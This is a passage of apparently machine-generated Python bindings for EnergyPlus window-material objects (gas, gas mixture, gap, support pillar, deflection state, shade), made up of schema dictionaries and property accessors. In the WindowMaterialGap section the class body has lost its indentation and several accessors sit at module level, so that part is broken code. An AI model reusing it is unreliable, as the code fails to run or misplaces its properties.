                                        'pyname': u'conductivity_coefficient_c',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'W/m-K3'}),
                                      (u'viscosity coefficient a',
                                       {'name': u'Viscosity Coefficient A',
                                        'pyname': u'viscosity_coefficient_a',
                                        'minimum>': 0.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'kg/m-s'}),
                                      (u'viscosity coefficient b',
                                       {'name': u'Viscosity Coefficient B',
                                        'pyname': u'viscosity_coefficient_b',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'kg/m-s-K'}),
                                      (u'viscosity coefficient c',
                                       {'name': u'Viscosity Coefficient C',
                                        'pyname': u'viscosity_coefficient_c',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'kg/m-s-K2'}),
                                      (u'specific heat coefficient a',
                                       {'name': u'Specific Heat Coefficient A',
                                        'pyname': u'specific_heat_coefficient_a',
                                        'minimum>': 0.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'J/kg-K'}),
                                      (u'specific heat coefficient b',
                                       {'name': u'Specific Heat Coefficient B',
                                        'pyname': u'specific_heat_coefficient_b',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'J/kg-K2'}),
                                      (u'specific heat coefficient c',
                                       {'name': u'Specific Heat Coefficient C',
                                        'pyname': u'specific_heat_coefficient_c',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'J/kg-K3'}),
                                      (u'molecular weight',
                                       {'name': u'Molecular Weight',
                                        'pyname': u'molecular_weight',
                                        'maximum': 200.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 20.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'g/mol'}),
                                      (u'specific heat ratio',
                                       {'name': u'Specific Heat Ratio',
                                        'pyname': u'specific_heat_ratio',
                                        'minimum>': 1.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real'})]),
               'format': None,
               'group': u'Surface Construction Elements',
               'min-fields': 3,
               'name': u'WindowMaterial:Gas',
               'pyname': u'WindowMaterialGas',
               'required-object': False,
               'unique-object': False}

    # One getter/setter pair per schema field; each simply delegates to
    # DataObject's item access using the field's display name as the key.
    @property
    def name(self):
        """field `Name`

        Args:
            value (str): value for IDD Field `Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `name` or None if not set
        """
        return self["Name"]

    @name.setter
    def name(self, value=None):
        """Corresponds to IDD field `Name`"""
        self["Name"] = value

    @property
    def gas_type(self):
        """field `Gas Type`

        Args:
            value (str): value for IDD Field `Gas Type`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `gas_type` or None if not set
        """
        return self["Gas Type"]

    @gas_type.setter
    def gas_type(self, value=None):
        """Corresponds to IDD field `Gas Type`"""
        self["Gas Type"] = value

    @property
    def thickness(self):
        """field `Thickness`

        | Units: m
        | IP-Units: in

        Args:
            value (float): value for IDD Field `Thickness`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `thickness` or None if not set
        """
        return self["Thickness"]

    @thickness.setter
    def thickness(self, value=None):
        """Corresponds to IDD field `Thickness`"""
        self["Thickness"] = value

    @property
    def conductivity_coefficient_a(self):
        """field `Conductivity Coefficient A`

        | Used only if Gas Type = Custom
        | Units: W/m-K

        Args:
            value (float): value for IDD Field `Conductivity Coefficient A`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `conductivity_coefficient_a` or None if not set
        """
        return self["Conductivity Coefficient A"]

    @conductivity_coefficient_a.setter
    def conductivity_coefficient_a(self, value=None):
        """Corresponds to IDD field `Conductivity Coefficient A`"""
        self["Conductivity Coefficient A"] = value

    @property
    def conductivity_coefficient_b(self):
        """field `Conductivity Coefficient B`

        | Used only if Gas Type = Custom
        | Units: W/m-K2

        Args:
            value (float): value for IDD Field `Conductivity Coefficient B`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `conductivity_coefficient_b` or None if not set
        """
        return self["Conductivity Coefficient B"]

    @conductivity_coefficient_b.setter
    def conductivity_coefficient_b(self, value=None):
        """Corresponds to IDD field `Conductivity Coefficient B`"""
        self["Conductivity Coefficient B"] = value

    @property
    def conductivity_coefficient_c(self):
        """field `Conductivity Coefficient C`

        | Used only if Gas Type = Custom
        | Units: W/m-K3

        Args:
            value (float): value for IDD Field `Conductivity Coefficient C`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `conductivity_coefficient_c` or None if not set
        """
        return self["Conductivity Coefficient C"]

    @conductivity_coefficient_c.setter
    def conductivity_coefficient_c(self, value=None):
        """Corresponds to IDD field `Conductivity Coefficient C`"""
        self["Conductivity Coefficient C"] = value

    @property
    def viscosity_coefficient_a(self):
        """field `Viscosity Coefficient A`

        | Used only if Gas Type = Custom
        | Units: kg/m-s

        Args:
            value (float): value for IDD Field `Viscosity Coefficient A`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `viscosity_coefficient_a` or None if not set
        """
        return self["Viscosity Coefficient A"]

    @viscosity_coefficient_a.setter
    def viscosity_coefficient_a(self, value=None):
        """Corresponds to IDD field `Viscosity Coefficient A`"""
        self["Viscosity Coefficient A"] = value

    @property
    def viscosity_coefficient_b(self):
        """field `Viscosity Coefficient B`

        | Used only if Gas Type = Custom
        | Units: kg/m-s-K

        Args:
            value (float): value for IDD Field `Viscosity Coefficient B`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `viscosity_coefficient_b` or None if not set
        """
        return self["Viscosity Coefficient B"]

    @viscosity_coefficient_b.setter
    def viscosity_coefficient_b(self, value=None):
        """Corresponds to IDD field `Viscosity Coefficient B`"""
        self["Viscosity Coefficient B"] = value

    @property
    def viscosity_coefficient_c(self):
        """field `Viscosity Coefficient C`

        | Used only if Gas Type = Custom
        | Units: kg/m-s-K2

        Args:
            value (float): value for IDD Field `Viscosity Coefficient C`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `viscosity_coefficient_c` or None if not set
        """
        return self["Viscosity Coefficient C"]

    @viscosity_coefficient_c.setter
    def viscosity_coefficient_c(self, value=None):
        """Corresponds to IDD field `Viscosity Coefficient C`"""
        self["Viscosity Coefficient C"] = value

    @property
    def specific_heat_coefficient_a(self):
        """field `Specific Heat Coefficient A`

        | Used only if Gas Type = Custom
        | Units: J/kg-K

        Args:
            value (float): value for IDD Field `Specific Heat Coefficient A`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `specific_heat_coefficient_a` or None if not set
        """
        return self["Specific Heat Coefficient A"]

    @specific_heat_coefficient_a.setter
    def specific_heat_coefficient_a(self, value=None):
        """Corresponds to IDD field `Specific Heat Coefficient A`"""
        self["Specific Heat Coefficient A"] = value

    @property
    def specific_heat_coefficient_b(self):
        """field `Specific Heat Coefficient B`

        | Used only if Gas Type = Custom
        | Units: J/kg-K2

        Args:
            value (float): value for IDD Field `Specific Heat Coefficient B`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `specific_heat_coefficient_b` or None if not set
        """
        return self["Specific Heat Coefficient B"]

    @specific_heat_coefficient_b.setter
    def specific_heat_coefficient_b(self, value=None):
        """Corresponds to IDD field `Specific Heat Coefficient B`"""
        self["Specific Heat Coefficient B"] = value

    @property
    def specific_heat_coefficient_c(self):
        """field `Specific Heat Coefficient C`

        | Used only if Gas Type = Custom
        | Units: J/kg-K3

        Args:
            value (float): value for IDD Field `Specific Heat Coefficient C`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `specific_heat_coefficient_c` or None if not set
        """
        return self["Specific Heat Coefficient C"]

    @specific_heat_coefficient_c.setter
    def specific_heat_coefficient_c(self, value=None):
        """Corresponds to IDD field `Specific Heat Coefficient C`"""
        self["Specific Heat Coefficient C"] = value

    @property
    def molecular_weight(self):
        """field `Molecular Weight`

        | Used only if Gas Type = Custom
        | Units: g/mol
        | value >= 20.0
        | value <= 200.0

        Args:
            value (float): value for IDD Field `Molecular Weight`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `molecular_weight` or None if not set
        """
        return self["Molecular Weight"]

    @molecular_weight.setter
    def molecular_weight(self, value=None):
        """Corresponds to IDD field `Molecular Weight`"""
        self["Molecular Weight"] = value

    @property
    def specific_heat_ratio(self):
        """field `Specific Heat Ratio`

        | Used only if Gas Type = Custom
        | value > 1.0

        Args:
            value (float): value for IDD Field `Specific Heat Ratio`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `specific_heat_ratio` or None if not set
        """
        return self["Specific Heat Ratio"]

    @specific_heat_ratio.setter
    def specific_heat_ratio(self, value=None):
        """Corresponds to IDD field `Specific Heat Ratio`"""
        self["Specific Heat Ratio"] = value
class WindowGapSupportPillar(DataObject):
    """ Corresponds to IDD object `WindowGap:SupportPillar`
        used to define pillar geometry for support pillars
    """
    # IDD-derived field metadata consumed by the DataObject base class for
    # lookup and validation of the properties below ('minimum>' marks an
    # exclusive lower bound).
    _schema = {'extensible-fields': OrderedDict(),
               'fields': OrderedDict([(u'name',
                                       {'name': u'Name',
                                        'pyname': u'name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'alpha'}),
                                      (u'spacing',
                                       {'name': u'Spacing',
                                        'pyname': u'spacing',
                                        'default': 0.04,
                                        'minimum>': 0.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'm'}),
                                      (u'radius',
                                       {'name': u'Radius',
                                        'pyname': u'radius',
                                        'default': 0.0004,
                                        'minimum>': 0.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'm'})]),
               'format': None,
               'group': u'Surface Construction Elements',
               'min-fields': 0,
               'name': u'WindowGap:SupportPillar',
               'pyname': u'WindowGapSupportPillar',
               'required-object': False,
               'unique-object': False}

    # One getter/setter pair per schema field; each delegates to DataObject's
    # item access using the field's display name as the key.
    @property
    def name(self):
        """field `Name`

        Args:
            value (str): value for IDD Field `Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `name` or None if not set
        """
        return self["Name"]

    @name.setter
    def name(self, value=None):
        """Corresponds to IDD field `Name`"""
        self["Name"] = value

    @property
    def spacing(self):
        """field `Spacing`

        | Units: m
        | Default value: 0.04

        Args:
            value (float): value for IDD Field `Spacing`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `spacing` or None if not set
        """
        return self["Spacing"]

    @spacing.setter
    def spacing(self, value=0.04):
        """Corresponds to IDD field `Spacing`"""
        self["Spacing"] = value

    @property
    def radius(self):
        """field `Radius`

        | Units: m
        | Default value: 0.0004

        Args:
            value (float): value for IDD Field `Radius`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `radius` or None if not set
        """
        return self["Radius"]

    @radius.setter
    def radius(self, value=0.0004):
        """Corresponds to IDD field `Radius`"""
        self["Radius"] = value
class WindowGapDeflectionState(DataObject):
    """ Corresponds to IDD object `WindowGap:DeflectionState`
        Used to enter data describing deflection state of the gap. It is referenced from
        WindowMaterial:Gap object only and it is used only when deflection model is set to
        MeasuredDeflection, otherwise it is ignored.
    """
    # IDD-derived field metadata consumed by the DataObject base class for
    # lookup and validation of the properties below.
    _schema = {'extensible-fields': OrderedDict(),
               'fields': OrderedDict([(u'name',
                                       {'name': u'Name',
                                        'pyname': u'name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'alpha'}),
                                      (u'deflected thickness',
                                       {'name': u'Deflected Thickness',
                                        'pyname': u'deflected_thickness',
                                        'default': 0.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'm'}),
                                      (u'initial temperature',
                                       {'name': u'Initial Temperature',
                                        'pyname': u'initial_temperature',
                                        'default': 25.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'C'}),
                                      (u'initial pressure',
                                       {'name': u'Initial Pressure',
                                        'pyname': u'initial_pressure',
                                        'default': 101325.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'Pa'})]),
               'format': None,
               'group': u'Surface Construction Elements',
               'min-fields': 0,
               'name': u'WindowGap:DeflectionState',
               'pyname': u'WindowGapDeflectionState',
               'required-object': False,
               'unique-object': False}

    # One getter/setter pair per schema field; each delegates to DataObject's
    # item access using the field's display name as the key.
    @property
    def name(self):
        """field `Name`

        Args:
            value (str): value for IDD Field `Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `name` or None if not set
        """
        return self["Name"]

    @name.setter
    def name(self, value=None):
        """Corresponds to IDD field `Name`"""
        self["Name"] = value

    @property
    def deflected_thickness(self):
        """field `Deflected Thickness`

        | If left blank will be considered that gap has no deflection.
        | Units: m

        Args:
            value (float): value for IDD Field `Deflected Thickness`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `deflected_thickness` or None if not set
        """
        return self["Deflected Thickness"]

    @deflected_thickness.setter
    def deflected_thickness(self, value=None):
        """Corresponds to IDD field `Deflected Thickness`"""
        self["Deflected Thickness"] = value

    @property
    def initial_temperature(self):
        """field `Initial Temperature`

        | Units: C
        | Default value: 25.0

        Args:
            value (float): value for IDD Field `Initial Temperature`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `initial_temperature` or None if not set
        """
        return self["Initial Temperature"]

    @initial_temperature.setter
    def initial_temperature(self, value=25.0):
        """Corresponds to IDD field `Initial Temperature`"""
        self["Initial Temperature"] = value

    @property
    def initial_pressure(self):
        """field `Initial Pressure`

        | Units: Pa
        | Default value: 101325.0

        Args:
            value (float): value for IDD Field `Initial Pressure`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `initial_pressure` or None if not set
        """
        return self["Initial Pressure"]

    @initial_pressure.setter
    def initial_pressure(self, value=101325.0):
        """Corresponds to IDD field `Initial Pressure`"""
        self["Initial Pressure"] = value
class WindowMaterialGasMixture(DataObject):
    """ Corresponds to IDD object `WindowMaterial:GasMixture`
        Gas mixtures that are used in Windows or Glass Doors
    """
    # IDD-derived field metadata consumed by the DataObject base class for
    # lookup and validation of the properties below.  'minimum>' marks an
    # exclusive lower bound; 'accepted-values' restricts alpha fields to the
    # listed choices.  Up to four gases may be specified (see
    # 'number of gases in mixture', range 1-4).
    _schema = {'extensible-fields': OrderedDict(),
               'fields': OrderedDict([(u'name',
                                       {'name': u'Name',
                                        'pyname': u'name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'alpha'}),
                                      (u'thickness',
                                       {'name': u'Thickness',
                                        'pyname': u'thickness',
                                        'minimum>': 0.0,
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'm'}),
                                      (u'number of gases in mixture',
                                       {'name': u'Number of Gases in Mixture',
                                        'pyname': u'number_of_gases_in_mixture',
                                        'maximum': 4,
                                        'required-field': True,
                                        'autosizable': False,
                                        'minimum': 1,
                                        'autocalculatable': False,
                                        'type': u'integer'}),
                                      (u'gas 1 type',
                                       {'name': u'Gas 1 Type',
                                        'pyname': u'gas_1_type',
                                        'required-field': True,
                                        'autosizable': False,
                                        'accepted-values': [u'Air',
                                                            u'Argon',
                                                            u'Krypton',
                                                            u'Xenon'],
                                        'autocalculatable': False,
                                        'type': 'alpha'}),
                                      (u'gas 1 fraction',
                                       {'name': u'Gas 1 Fraction',
                                        'pyname': u'gas_1_fraction',
                                        'minimum>': 0.0,
                                        'maximum': 1.0,
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real'}),
                                      (u'gas 2 type',
                                       {'name': u'Gas 2 Type',
                                        'pyname': u'gas_2_type',
                                        'required-field': True,
                                        'autosizable': False,
                                        'accepted-values': [u'Air',
                                                            u'Argon',
                                                            u'Krypton',
                                                            u'Xenon'],
                                        'autocalculatable': False,
                                        'type': 'alpha'}),
                                      (u'gas 2 fraction',
                                       {'name': u'Gas 2 Fraction',
                                        'pyname': u'gas_2_fraction',
                                        'minimum>': 0.0,
                                        'maximum': 1.0,
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real'}),
                                      (u'gas 3 type',
                                       {'name': u'Gas 3 Type',
                                        'pyname': u'gas_3_type',
                                        'required-field': False,
                                        'autosizable': False,
                                        'accepted-values': [u'Air',
                                                            u'Argon',
                                                            u'Krypton',
                                                            u'Xenon'],
                                        'autocalculatable': False,
                                        'type': 'alpha'}),
                                      (u'gas 3 fraction',
                                       {'name': u'Gas 3 Fraction',
                                        'pyname': u'gas_3_fraction',
                                        'minimum>': 0.0,
                                        'maximum': 1.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real'}),
                                      (u'gas 4 type',
                                       {'name': u'Gas 4 Type',
                                        'pyname': u'gas_4_type',
                                        'required-field': False,
                                        'autosizable': False,
                                        'accepted-values': [u'Air',
                                                            u'Argon',
                                                            u'Krypton',
                                                            u'Xenon'],
                                        'autocalculatable': False,
                                        'type': 'alpha'}),
                                      (u'gas 4 fraction',
                                       {'name': u'Gas 4 Fraction',
                                        'pyname': u'gas_4_fraction',
                                        'minimum>': 0.0,
                                        'maximum': 1.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real'})]),
               'format': None,
               'group': u'Surface Construction Elements',
               'min-fields': 7,
               'name': u'WindowMaterial:GasMixture',
               'pyname': u'WindowMaterialGasMixture',
               'required-object': False,
               'unique-object': False}

    # One getter/setter pair per schema field; each delegates to DataObject's
    # item access using the field's display name as the key.
    @property
    def name(self):
        """field `Name`

        Args:
            value (str): value for IDD Field `Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `name` or None if not set
        """
        return self["Name"]

    @name.setter
    def name(self, value=None):
        """Corresponds to IDD field `Name`"""
        self["Name"] = value

    @property
    def thickness(self):
        """field `Thickness`

        | Units: m

        Args:
            value (float): value for IDD Field `Thickness`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `thickness` or None if not set
        """
        return self["Thickness"]

    @thickness.setter
    def thickness(self, value=None):
        """Corresponds to IDD field `Thickness`"""
        self["Thickness"] = value

    @property
    def number_of_gases_in_mixture(self):
        """field `Number of Gases in Mixture`

        | value >= 1
        | value <= 4

        Args:
            value (int): value for IDD Field `Number of Gases in Mixture`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            int: the value of `number_of_gases_in_mixture` or None if not set
        """
        return self["Number of Gases in Mixture"]

    @number_of_gases_in_mixture.setter
    def number_of_gases_in_mixture(self, value=None):
        """Corresponds to IDD field `Number of Gases in Mixture`"""
        self["Number of Gases in Mixture"] = value

    @property
    def gas_1_type(self):
        """field `Gas 1 Type`

        Args:
            value (str): value for IDD Field `Gas 1 Type`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `gas_1_type` or None if not set
        """
        return self["Gas 1 Type"]

    @gas_1_type.setter
    def gas_1_type(self, value=None):
        """Corresponds to IDD field `Gas 1 Type`"""
        self["Gas 1 Type"] = value

    @property
    def gas_1_fraction(self):
        """field `Gas 1 Fraction`

        | value <= 1.0

        Args:
            value (float): value for IDD Field `Gas 1 Fraction`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `gas_1_fraction` or None if not set
        """
        return self["Gas 1 Fraction"]

    @gas_1_fraction.setter
    def gas_1_fraction(self, value=None):
        """Corresponds to IDD field `Gas 1 Fraction`"""
        self["Gas 1 Fraction"] = value

    @property
    def gas_2_type(self):
        """field `Gas 2 Type`

        Args:
            value (str): value for IDD Field `Gas 2 Type`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `gas_2_type` or None if not set
        """
        return self["Gas 2 Type"]

    @gas_2_type.setter
    def gas_2_type(self, value=None):
        """Corresponds to IDD field `Gas 2 Type`"""
        self["Gas 2 Type"] = value

    @property
    def gas_2_fraction(self):
        """field `Gas 2 Fraction`

        | value <= 1.0

        Args:
            value (float): value for IDD Field `Gas 2 Fraction`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `gas_2_fraction` or None if not set
        """
        return self["Gas 2 Fraction"]

    @gas_2_fraction.setter
    def gas_2_fraction(self, value=None):
        """Corresponds to IDD field `Gas 2 Fraction`"""
        self["Gas 2 Fraction"] = value

    @property
    def gas_3_type(self):
        """field `Gas 3 Type`

        Args:
            value (str): value for IDD Field `Gas 3 Type`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `gas_3_type` or None if not set
        """
        return self["Gas 3 Type"]

    @gas_3_type.setter
    def gas_3_type(self, value=None):
        """Corresponds to IDD field `Gas 3 Type`"""
        self["Gas 3 Type"] = value

    @property
    def gas_3_fraction(self):
        """field `Gas 3 Fraction`

        | value <= 1.0

        Args:
            value (float): value for IDD Field `Gas 3 Fraction`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `gas_3_fraction` or None if not set
        """
        return self["Gas 3 Fraction"]

    @gas_3_fraction.setter
    def gas_3_fraction(self, value=None):
        """Corresponds to IDD field `Gas 3 Fraction`"""
        self["Gas 3 Fraction"] = value

    @property
    def gas_4_type(self):
        """field `Gas 4 Type`

        Args:
            value (str): value for IDD Field `Gas 4 Type`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `gas_4_type` or None if not set
        """
        return self["Gas 4 Type"]

    @gas_4_type.setter
    def gas_4_type(self, value=None):
        """Corresponds to IDD field `Gas 4 Type`"""
        self["Gas 4 Type"] = value

    @property
    def gas_4_fraction(self):
        """field `Gas 4 Fraction`

        | value <= 1.0

        Args:
            value (float): value for IDD Field `Gas 4 Fraction`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `gas_4_fraction` or None if not set
        """
        return self["Gas 4 Fraction"]

    @gas_4_fraction.setter
    def gas_4_fraction(self, value=None):
        """Corresponds to IDD field `Gas 4 Fraction`"""
        self["Gas 4 Fraction"] = value
class WindowMaterialGap(DataObject):
""" Corresponds to IDD object `WindowMaterial:Gap`
Used to define the gap between two layers in a complex fenestration system, where the
Construction:ComplexFenestrationState object is used. It is referenced as a layer in the
Construction:ComplexFenestrationState object. It cannot be referenced as a layer from the
Construction object.
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'thickness',
{'name': u'Thickness',
'pyname': u'thickness',
'minimum>': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'm'}),
(u'gas (or gas mixture)',
{'name': u'Gas (or Gas Mixture)',
'pyname': u'gas_or_gas_mixture',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'pressure',
{'name': u'Pressure',
'pyname': u'pressure',
'default': 101325.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'Pa'}),
(u'deflection state',
{'name': u'Deflection State',
'pyname': u'deflection_state',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'support pillar',
{'name': u'Support Pillar',
'pyname': u'support_pillar',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 0,
'name': u'WindowMaterial:Gap',
'pyname': u'WindowMaterialGap',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def thickness(self):
"""field `Thickness`
| Units: m
Args:
value (float): value for IDD Field `Thickness`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thickness` or None if not set
"""
return self["Thickness"]
@thickness.setter
def thickness(self, value=None):
"""Corresponds to IDD field `Thickness`"""
self["Thickness"] = value
@property
def gas_or_gas_mixture(self):
"""field `Gas (or Gas Mixture)`
| This field should reference only WindowMaterial:Gas
| or WindowMaterial:GasMixture objects
Args:
value (str): value for IDD Field `Gas (or Gas Mixture)`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `gas_or_gas_mixture` or None if not set
"""
return self["Gas (or Gas Mixture)"]
@gas_or_gas_mixture.setter
def gas_or_gas_mixture(self, value=None):
"""Corresponds to IDD field `Gas (or Gas Mixture)`"""
self["Gas (or Gas Mixture)"] = value
@property
def pressure(self):
    """Return the IDD field `Pressure` (units: Pa).

    The IDD default for this field is 101325.0 (standard atmosphere).

    Returns:
        float: the gap pressure in pascals, or None if the field is unset.
    """
    return self["Pressure"]


@pressure.setter
def pressure(self, value=101325.0):
    """Assign the IDD field `Pressure` (units: Pa).

    Args:
        value (float): new pressure in pascals; defaults to 101325.0.

    Raises:
        ValueError: if `value` is not accepted as a valid value.
    """
    self["Pressure"] = value
@property
def deflection_state(self):
    """Return the IDD field `Deflection State`.

    If left blank, the gap is considered not deflected.

    Returns:
        str: the deflection-state object name, or None if unset.
    """
    return self["Deflection State"]


@deflection_state.setter
def deflection_state(self, value=None):
    """Assign the IDD field `Deflection State`.

    Args:
        value (str): name of the deflection-state object, or None to
            leave the gap undeflected.

    Raises:
        ValueError: if `value` is not accepted as a valid value.
    """
    self["Deflection State"] = value
@property
def support_pillar(self):
    """Return the IDD field `Support Pillar`.

    If left blank, the gap is considered to have no support pillars.

    Returns:
        str: the support-pillar object name, or None if unset.
    """
    return self["Support Pillar"]


@support_pillar.setter
def support_pillar(self, value=None):
    """Assign the IDD field `Support Pillar`.

    Args:
        value (str): name of the support-pillar object, or None for a gap
            without support pillars.

    Raises:
        ValueError: if `value` is not accepted as a valid value.
    """
    self["Support Pillar"] = value
class WindowMaterialShade(DataObject):

    """ Corresponds to IDD object `WindowMaterial:Shade`
        Specifies the properties of window shade materials. Reflectance and emissivity
        properties are assumed to be the same on both sides of the shade. Shades are considered
        to be perfect diffusers (all transmitted and reflected radiation is
        hemispherically-diffuse) independent of angle of incidence.
    """

    # Machine-generated metadata mirroring the EnergyPlus IDD definition of
    # WindowMaterial:Shade.  DataObject consults it for field order, defaults
    # and validation limits; keys 'minimum>'/'maximum<' denote strict
    # (exclusive) bounds.  Do not edit by hand.
    _schema = {
        'extensible-fields': OrderedDict(),
        'fields': OrderedDict([
            (u'name',
             {'name': u'Name', 'pyname': u'name',
              'required-field': True, 'autosizable': False,
              'autocalculatable': False, 'type': u'alpha'}),
            (u'solar transmittance',
             {'name': u'Solar Transmittance',
              'pyname': u'solar_transmittance',
              'maximum<': 1.0, 'required-field': True, 'autosizable': False,
              'minimum': 0.0, 'autocalculatable': False,
              'type': u'real', 'unit': u'dimensionless'}),
            (u'solar reflectance',
             {'name': u'Solar Reflectance',
              'pyname': u'solar_reflectance',
              'maximum<': 1.0, 'required-field': True, 'autosizable': False,
              'minimum': 0.0, 'autocalculatable': False,
              'type': u'real', 'unit': u'dimensionless'}),
            (u'visible transmittance',
             {'name': u'Visible Transmittance',
              'pyname': u'visible_transmittance',
              'maximum<': 1.0, 'required-field': True, 'autosizable': False,
              'minimum': 0.0, 'autocalculatable': False,
              'type': u'real', 'unit': u'dimensionless'}),
            (u'visible reflectance',
             {'name': u'Visible Reflectance',
              'pyname': u'visible_reflectance',
              'maximum<': 1.0, 'required-field': True, 'autosizable': False,
              'minimum': 0.0, 'autocalculatable': False,
              'type': u'real', 'unit': u'dimensionless'}),
            (u'infrared hemispherical emissivity',
             {'name': u'Infrared Hemispherical Emissivity',
              'pyname': u'infrared_hemispherical_emissivity',
              'minimum>': 0.0, 'required-field': True, 'autosizable': False,
              'autocalculatable': False, 'type': u'real',
              'maximum<': 1.0, 'unit': u'dimensionless'}),
            (u'infrared transmittance',
             {'name': u'Infrared Transmittance',
              'pyname': u'infrared_transmittance',
              'maximum<': 1.0, 'required-field': True, 'autosizable': False,
              'minimum': 0.0, 'autocalculatable': False,
              'type': u'real', 'unit': u'dimensionless'}),
            (u'thickness',
             {'name': u'Thickness', 'pyname': u'thickness',
              'minimum>': 0.0, 'required-field': True, 'autosizable': False,
              'autocalculatable': False, 'type': u'real', 'unit': u'm'}),
            (u'conductivity',
             {'name': u'Conductivity', 'pyname': u'conductivity',
              'minimum>': 0.0, 'required-field': True, 'autosizable': False,
              'autocalculatable': False, 'type': u'real', 'unit': u'W/m-K'}),
            (u'shade to glass distance',
             {'name': u'Shade to Glass Distance',
              'pyname': u'shade_to_glass_distance',
              'default': 0.05, 'maximum': 1.0,
              'required-field': False, 'autosizable': False,
              'minimum': 0.001, 'autocalculatable': False,
              'type': u'real', 'unit': u'm'}),
            (u'top opening multiplier',
             {'name': u'Top Opening Multiplier',
              'pyname': u'top_opening_multiplier',
              'default': 0.5, 'maximum': 1.0,
